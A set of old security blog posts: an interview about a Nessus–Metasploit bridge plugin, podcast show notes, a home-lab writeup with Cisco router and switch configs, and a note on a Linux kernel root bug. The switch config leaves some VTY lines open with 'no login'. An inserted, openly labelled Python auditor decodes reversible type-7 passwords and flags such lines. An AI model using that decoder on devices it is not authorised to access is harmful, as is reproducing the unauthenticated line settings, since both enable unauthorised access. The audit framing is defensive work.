Everything kind of clicked together and I thought what if I could stick that library in Metasploit and talk directly to my Nessus server and import the data right into Metasploit.  Some awkward talks about licenses later and HDM merged k0st's library and my basic shell of a plugin.  (Big thanks to k0st for his hard work on the library which I used as a starting point)

Q: What advice would you give  a newcomer that would like start using this  bridge?

A: Test it out and send me (or Metasploit) bug reports/enhancement requests… hehe.  Full guide on using the plugin is up at http://blog.zate.org/2010/09/26/nessus-bridge-for-metasploit-intro/ . Don’t be shy, join #nessus or #metasploit on freenode and ask questions (I am in there as MrUrbanity or Zate).  Start with working with all the tools on one box (nessus, msf, database) and I find Ubuntu (native or vmware player) the best way to start.  Scan things (that you have permission to scan, or own) and play with it, see how it works.

Q: What tips would you give someone for maximizing the usefulness of this  bridge?

A: This plugin wont magically make your Nessus scans more accurate, you still have to tweak/tune them and honestly right now that is probably best done through the web interface for policy tuning.  Don’t expect to scan a class C and have it import easily, big reports are a pain right now (streaming parser coming soon).  Ideally the way to use this is scan, examine, import, pwn.  It’s not a replacement for knowing about exploits and vulnerabilities, you will still need to do some work :).

Q: Why did you choose Metasploit above other application/frameworks to incorporate this  functionality?

A: I don’t think there is another offensive exploitation tool out there with the same power and flexibility to allow it’s end users to join in the fun and submit modifications.  It’s one thing to do a RFE (Request for Enhancement) and another entirely to code that enhancement and submit it to be included in the tool.  I think the combination of free msf and a free (or cheap) nessus scanner is pretty powerful for a security guy trying hard to keep his network running securely.  Also ruby is just a joy to code in.

Q: On a personal note, how did you get your handle?

A: I tend to go by MrUrbanity a lot and Urbanity means polite/refined/quiet which depending on who you ask is either me, or not me.  I’m a pretty calm guy, takes quite a bit to offend or upset me so the name kind of fit.

Q: If someone wants to assist you with this project what's the best approach?

A: Couple of ways.  Email me (zate75 [at] gmail.com) or find me on IRC (freenode in #metasploit and #nessus) or head to http://github.com/Zate/Nessus-Bridge-for-Metasploit, fork it, hack it and submit a pull request for me to include your changes.  I then submit a diff to msfdev about once a week (or when I have significant changes).

You can also help me out a great deal by grabbing the code off github and running it and then reporting any bugs or features back to github.  Why github and not the metasploit site?  Mainly to not annoy the msfdevs.  This way I can tweak/hack/commit as often as I need to and not impact their work on msf.  I can then just submit working code when I need it included in msf.

A big thank you to Zate a.k.a MrUrbanity for letting me interview and most importantly for making such a contribution to the community.

Notes for Linux Basix Eps22

Today’s post will serve as a sort of show notes for the Linux Basix podcast that I will be a guest on tonight.

Discussion Links:

  1. SET v0.7 aka "Swagger Wagon" new release. I did a blog posting on the 14th highlighting SET, and I am mentioning it here again because I think it is worth taking a look at this program. For anyone not familiar with the Social-Engineer Toolkit (SET), it's specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. The group also held a Social Engineering Capture the Flag competition at Defcon 18, and they have finally released the full report: http://www.social-engineer.org/resources/sectf/Social-Engineer_CTF_Report.pdf
  2. A report was published detailing the exploits of a former Google engineer who allegedly used his internal clearances to access private Gmail and GTalk accounts so that he could spy on and harass people, including four minors; read more over at http://techcrunch.com/2010/09/14/google-engineer-spying-fired/. Now this brings me back to a similar point I made a while back: we have to stop putting all our trust in cloud-based services, because we never know if or how much they are violating our privacy.
  3. Second time's a charm, "Linux Kernel 0-day bug": on the 16th I did a quick news bulletin post highlighting a serious Linux vulnerability. The vulnerability, in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa), was fixed once before, in 2007 with the release of kernel version 2.6.22.7. But several months later developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access. Read the complete article over at The Register.
  4. Is Stuxnet the 'best' malware ever? Even though this is not a Linux-related issue, I know a lot of us fix our friends' and family's computers, and it's always good to keep up on new malware threats. The Stuxnet worm is a "groundbreaking" piece of malware so devious in its use of unpatched vulnerabilities, so sophisticated in its multipronged approach, that the security researchers who tore it apart believe it may be the work of state-backed professionals. They work for the two security companies that discovered that Stuxnet exploited not just one zero-day Windows bug but four, an unprecedented number for a single piece of malware; read the full article over at computerworld.com.
  5. Tunneling SSH over HTTP(S). Not much to say about this one, but I think it's pretty cool and you should give it a try; I know I will. --> http://dag.wieers.com/howto/ssh-http-tunneling/

Tech Segment: Building your test lab


During this segment I will be discussing what I have been up to for the last few days, and that's rebuilding my home network so I can have more than just a laptop to perform my various testing.

Equipment used in lab:

  • HP DL 380 G4 server with 6 drives (2X75, 4X150) with ESXi installed.
  • Cisco 3500 switch
  • Cisco 2621 router
  • Verizon FIOS Wifi router.
  • PFsense FW

OS currently installed:

  • FreeBSD
  • Ubuntu server
  • Snorby IDS

Router config:

RT01#sh run
Building configuration…

Current configuration : 1202 bytes
!
version 12.1
no service single-slot-reload-enable
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname RT01
!
enable secret 5 10g1n///
enable password 7 10g1n///
!
ip subnet-zero
!
interface FastEthernet0/0
no ip address
speed 100
full-duplex
!
interface FastEthernet0/0.30
encapsulation dot1Q 30
ip address 10.29.19.1 255.255.255.0
!
interface FastEthernet0/0.40
encapsulation dot1Q 40
ip address 10.29.20.1 255.255.255.0
!
interface FastEthernet0/0.50
encapsulation dot1Q 50
ip address 10.29.21.1 255.255.255.0
!
interface Serial0/0
no ip address
shutdown
!
interface FastEthernet0/1
description Transit-to-FW
ip address 172.1.1.2 255.255.255.252
duplex auto
speed auto
!
interface FastEthernet0/1.10
encapsulation dot1Q 10
!
router rip
version 2
network 172.0.0.0
network 10.29.0.0
no auto-summary
!
ip classless
ip route 0.0.0.0 0.0.0.0 172.1.1.1
no ip http server
!
line con 0
password 7 10g1n///
login
line aux 0
line vty 0 2
password 7 10g1n///
login
line vty 3 4
password 7 10g1n///
login
!
end

Switch Config:

SW01#sh run
Building configuration…

Current configuration:
!
! No configuration change since last restart
!
version 12.0
no service pad
service timestamps debug uptime
service timestamps log datetime msec
service password-encryption
!
hostname SW01
!
enable password 7 10g1n///
!
username infolookup password 7 10g1n///
!
ip subnet-zero
no ip domain-lookup
!
interface FastEthernet0/1
description Uplink-to-Verizon
switchport access vlan 10
spanning-tree portfast
!
interface FastEthernet0/2
description Firewall-OUT-interface
switchport access vlan 10
spanning-tree portfast
!
interface FastEthernet0/3
description Firewall Inside-Transit
switchport access vlan 11
!
interface FastEthernet0/4
description Link to Router  – Fa0/1
duplex full
switchport access vlan 11
!
interface FastEthernet0/5
!
interface FastEthernet0/18
!
interface FastEthernet0/19
switchport access vlan 30
spanning-tree portfast
!
interface FastEthernet0/20
description Inside-workstation
switchport access vlan 40
spanning-tree portfast
!
interface FastEthernet0/33
description ESX Host
duplex full
speed 100
switchport trunk encapsulation dot1q
switchport trunk native vlan 30
switchport trunk allowed vlan 1,30,40,50,1002-1005
switchport mode trunk
!
interface FastEthernet0/34
!
interface FastEthernet0/35
description ESXi Host-Mgmnt
duplex full
speed 100
switchport access vlan 40
spanning-tree portfast
!
interface FastEthernet0/36
!
interface FastEthernet0/48
duplex full
speed 100
switchport trunk encapsulation dot1q
switchport trunk native vlan 30
switchport trunk allowed vlan 1,30,40,50,1002-1005
switchport mode trunk
!
interface GigabitEthernet0/1
!
interface GigabitEthernet0/2
!
interface VLAN1
no ip address
no ip directed-broadcast
no ip route-cache
shutdown
!
interface VLAN30
ip address 10.29.19.10 255.255.255.0
no ip directed-broadcast
no ip route-cache
!
interface VLAN100
no ip directed-broadcast
no ip route-cache
shutdown
!
ip default-gateway 10.29.19.1
!
line con 0
exec-timeout 0 0
password 7 10g1n///
login local
transport input none
stopbits 1
line vty 0 4
password 7 10g1n///
login local
line vty 5 15
no login
!
ntp clock-period 11259018
ntp server 153.16.4.130
end
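Two things a reviewer flags in the configs above: the type-7 passwords that `service password-encryption` produces (a fixed-key XOR, reversible in milliseconds, so they only protect against shoulder-surfing), and the switch's `line vty 5 15` with `no login`, which lets anyone who can reach those lines in without authenticating. The following is an added example, not from the original post or from Cisco: a small auditor that decodes type-7 strings with the publicly documented key and walks the line blocks. SAMPLE_CONFIG is constructed in the shape of the switch config; the page's own 10g1n/// placeholders are not valid type-7 strings and are reported as such.

```python
"""Audit an IOS running-config for reversible type-7 passwords and unauthenticated VTY lines.
Added example for this page; SAMPLE_CONFIG is constructed."""
import re

# The fixed XOR key IOS uses for 'service password-encryption' (type 7); long public.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Matches 'password 7 X', 'enable password 7 X' and 'username U [privilege N] password 7 X'
PASSWORD7 = re.compile(r"(?:enable |username \S+ (?:privilege \d+ )?)?password 7 (\S+)$")

SAMPLE_CONFIG = """\
service password-encryption
!
hostname SW01
!
enable secret 5 $1$PLAC$eholderholderholderho
enable password 7 0822455D0A16
!
username infolookup password 7 094F471A1A0A
!
line con 0
 password 7 0822455D0A16
 login local
line vty 0 4
 password 7 10g1n///
 login local
line vty 5 15
 no login
!
end
"""


def decode_type7(value):
    """Reverse a type-7 value: two decimal digits give the key offset, then one hex byte per character.
    Returns None when the string is not well-formed type 7 (e.g. a placeholder)."""
    if len(value) < 4 or len(value) % 2 or not value[:2].isdigit():
        return None
    body = value[2:]
    if any(c not in "0123456789ABCDEFabcdef" for c in body):
        return None
    seed = int(value[:2])
    out = bytearray()
    for i in range(0, len(body), 2):
        out.append(int(body[i:i + 2], 16) ^ TYPE7_KEY[(seed + i // 2) % len(TYPE7_KEY)])
    return out.decode("ascii", "replace")


def audit_ios_config(text):
    """Return (line_number, finding) pairs."""
    lines = text.splitlines()
    has_secret = any(l.strip().startswith("enable secret") for l in lines)
    findings, block = [], None
    for n, raw in enumerate(lines, 1):
        line = raw.strip()
        if line.startswith("line "):
            block = line                      # entering a 'line con/aux/vty' block
        elif line in ("!", "end"):
            block = None
        m = PASSWORD7.match(line)
        if m:
            plain = decode_type7(m.group(1))
            if plain is None:
                findings.append((n, "type-7 field %r is not a valid type-7 string (placeholder?)" % m.group(1)))
            else:
                findings.append((n, "type-7 password decodes to %r" % plain))
        if line.startswith("enable password") and has_secret:
            findings.append((n, "enable password is redundant next to enable secret and is reversible"))
        if block and block.startswith("line vty") and line == "no login":
            findings.append((n, "%s accepts sessions with no authentication ('no login')" % block))
    return findings


if __name__ == "__main__":
    for n, msg in audit_ios_config(SAMPLE_CONFIG):
        print("line %d: %s" % (n, msg))
```

Feed it the output of `show running-config`. The fixes are the usual ones: `enable secret` only (drop `enable password`), `username ... secret` where the IOS supports it, and every vty line with `login local` or AAA plus `transport input ssh`; a lab config that is reachable from the Verizon side of the firewall deserves the same treatment as a production one.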

PFsense Config:

  • Configured port forwarding; you can do this via the interface or by editing /config/config.xml
    • Forward to my FreeBSD box
    • Configured my dynamic DNS  host (free of course)
    • Forward my VMware ESX connection over SSH
    • Configured Snort to send logs to Snorby

Links:

Second time’s a charm “Linux Kernel 0-day bug”

I am sure by noon today you will see lots more technology blogs talking about this old but yet new bug. “The Linux kernel has been purged of a bug that gave root access to untrusted users – again.”

Background:

The vulnerability in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa) was fixed once before – in 2007 with the release of version 2.6.22.7. But several months later, developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access.


The bug was originally discovered by the late hacker Wojciech “cliph” Purczynski. But Ben Hawkes, the researcher who discovered the kernel regression bug, said here that he grew suspicious when he recently began tinkering under the hood of the open-source OS and saw signs the flaw was still active. Read the complete article over at The Register..

A sample exploit is already in the wild, as shown at http://seclists.org/fulldisclosure/2010/Sep/268 . Since I am not an expert in exploit development or analysis, I will sit back and wait for the guys over at Metasploit or SET to whip something up so I can test.